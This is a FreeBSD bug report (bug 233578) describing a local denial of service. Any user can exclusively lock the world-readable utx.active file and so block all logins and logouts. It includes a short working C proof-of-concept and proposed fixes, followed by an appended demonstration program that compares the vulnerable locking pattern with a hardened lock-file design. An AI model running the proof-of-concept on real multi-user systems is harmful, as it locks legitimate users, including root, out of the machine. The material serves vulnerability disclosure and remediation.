[Bug 233578] Unprivileged local user can prevent other users logging in by locking utx.active

bugzilla-noreply at freebsd.org bugzilla-noreply at freebsd.org
Tue Nov 27 20:03:50 UTC 2018


https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=233578

            Bug ID: 233578
           Summary: Unprivileged local user can prevent other users
                    logging in by locking utx.active
           Product: Base System
           Version: 11.2-RELEASE
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Only Me
          Priority: ---
         Component: bin
          Assignee: bugs at FreeBSD.org
          Reporter: davmac at davmac.org

The utx.active database (/var/run/utx.active) maintains a list of currently
logged-in users; it needs to be updated when a user logs in or out. This file
is world-readable (which allows "who" to list logged-in users without requiring
suid root).

Since updating the file requires locking it, and this is done via open with
O_EXLOCK, it is possible for a user to indefinitely postpone updates to the
file by locking the file themselves. The program below can be used to do this
(it does not require root privileges). While this program is running it will be
impossible for any other user (including root) to log in to the system.

The problematic locking code is in pututxline.c, function futx_open(), here:

https://github.com/freebsd/freebsd/blob/master/lib/libc/gen/pututxline.c#L46

The example program is as follows:

--- begin ---
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void)
{
    /* A read-only open is enough to take the exclusive lock, because the
     * file is world-readable and O_EXLOCK does not require write access. */
    int fd = open("/var/run/utx.active", O_EXLOCK | O_RDONLY);
    if (fd < 0) {
        perror("open /var/run/utx.active");
        return 1;
    }
    /* Hold the lock: every pututxline() caller (login, logout) blocks on it. */
    sleep(100);
    close(fd);
    return 0;
}
--- end ---

This program runs for 100 seconds during which no other logins will be possible
(and logouts will also stall).

In terms of solution, I would recommend either:
(a) making the file not world-readable and making "who" and any other relevant
programs setgid to a group with permission to read the file, or
(b) changing the locking mechanism implemented in pututxline.c, so that it
locks a separate file which is not world readable and uses that lock to control
access to the utx.active file.

Note that GNU libc has a similar issue, but uses an fcntl-based lock with a
timeout of 10 seconds. This means that logins cannot be completely disabled by
the user, but they can prevent the utmp (equivalent to utx.active) database
from being updated. I do not recommend this approach.
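The following program is an added demonstration for this report; it is not code from the report, from FreeBSD libc, or from any proposed patch. It contrasts the locking pattern the report describes (an exclusive lock taken on the world-readable database itself) with recommendation (b): take the lock on a separate, non-world-readable file and only then open the database. It assumes flock(2) semantics, which is what O_EXLOCK gives on FreeBSD, and calls flock(2) explicitly so the program also builds on Linux. The paths are temporary files created by the program rather than /var/run/utx.active, and the "attacker" is a second open file description in the same process, which flock(2) treats like a lock held by another process. The function names vulnerable_update, hardened_update and demo_attacker_holds_db_lock are mine, not libc's.

```c
/* Added demonstration, not code from the bug report or FreeBSD libc.
 * Contrasts the report's pattern (exclusive lock on the world-readable
 * database) with recommendation (b): lock a separate 0600 file instead.
 * flock(2) is used explicitly in place of O_EXLOCK so this builds on
 * Linux as well; on FreeBSD open(2) with O_EXLOCK takes the same lock. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/file.h>
#include <sys/stat.h>
#include <unistd.h>

/* Non-blocking exclusive lock. 1 = acquired, 0 = another holder would
 * make us block (this is where the real code hangs), -1 = error. */
static int try_exlock(int fd)
{
    if (flock(fd, LOCK_EX | LOCK_NB) == 0)
        return 1;
    return errno == EWOULDBLOCK ? 0 : -1;
}

/* The pattern the report attributes to futx_open(): lock the database file
 * that is about to be modified. Anyone who can open the file (it is
 * world-readable) can hold this lock, so a read-only opener stalls all
 * logins and logouts. Made non-blocking here so the demo reports instead
 * of hanging. */
int vulnerable_update(const char *db)
{
    int fd = open(db, O_RDWR);
    if (fd < 0)
        return -1;
    int r = try_exlock(fd);
    if (r == 1) {
        /* ... rewrite the database here ... */
        flock(fd, LOCK_UN);
    }
    close(fd);
    return r;
}

/* Recommendation (b): serialise updates on a separate lock file that is
 * mode 0600 (root-owned under /var/run in a real deployment). Unprivileged
 * users can still read the database, but cannot open the lock file and
 * therefore cannot hold the lock that updates wait on. */
int hardened_update(const char *lockpath, const char *db)
{
    int lfd = open(lockpath, O_RDWR | O_CREAT, 0600);
    if (lfd < 0)
        return -1;
    int r = try_exlock(lfd);
    if (r != 1) {
        close(lfd);
        return r;
    }
    int fd = open(db, O_RDWR);    /* no lock is taken on the database itself */
    if (fd < 0) {
        flock(lfd, LOCK_UN);
        close(lfd);
        return -1;
    }
    /* ... rewrite the database here, protected by the lock on lockpath ... */
    close(fd);
    flock(lfd, LOCK_UN);
    close(lfd);
    return 1;
}

/* The report's scenario: the "attacker" opens the world-readable database
 * read-only, takes an exclusive lock exactly as the PoC does, and holds it.
 * Stores the two update results and returns 1 when the original pattern is
 * blocked while the hardened pattern still succeeds. */
int demo_attacker_holds_db_lock(int *vuln_result, int *hard_result)
{
    char db[]   = "/tmp/utx.active.XXXXXX";  /* stand-in for /var/run/utx.active */
    char lock[] = "/tmp/utx.lock.XXXXXX";    /* separate lock file for option (b) */
    int dbfd = mkstemp(db), lkfd = mkstemp(lock);
    if (dbfd < 0 || lkfd < 0)
        return -1;
    fchmod(dbfd, 0644);                      /* world-readable, like utx.active */
    fchmod(lkfd, 0600);                      /* unreadable by other users */
    close(dbfd);
    close(lkfd);

    int attacker = open(db, O_RDONLY);       /* read-only open is all it takes */
    if (attacker < 0 || flock(attacker, LOCK_EX) < 0)
        return -1;

    *vuln_result = vulnerable_update(db);     /* 0: stalls behind the attacker */
    *hard_result = hardened_update(lock, db); /* 1: lock file is unaffected */

    flock(attacker, LOCK_UN);
    close(attacker);
    unlink(db);
    unlink(lock);
    return *vuln_result == 0 && *hard_result == 1;
}

int main(void)
{
    int v = -1, h = -1;
    int ok = demo_attacker_holds_db_lock(&v, &h);
    printf("vulnerable pattern: %s, hardened pattern: %s\n",
           v == 0 ? "blocked" : "acquired", h == 1 ? "acquired" : "blocked");
    return ok == 1 ? 0 : 1;
}
```

Run as any user; it prints that the vulnerable pattern is blocked while the hardened one acquires its lock. The lock file only protects updates if unprivileged users cannot open it at all, which is why it must live in a root-owned directory with mode 0600 rather than next to a world-readable file they can open.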
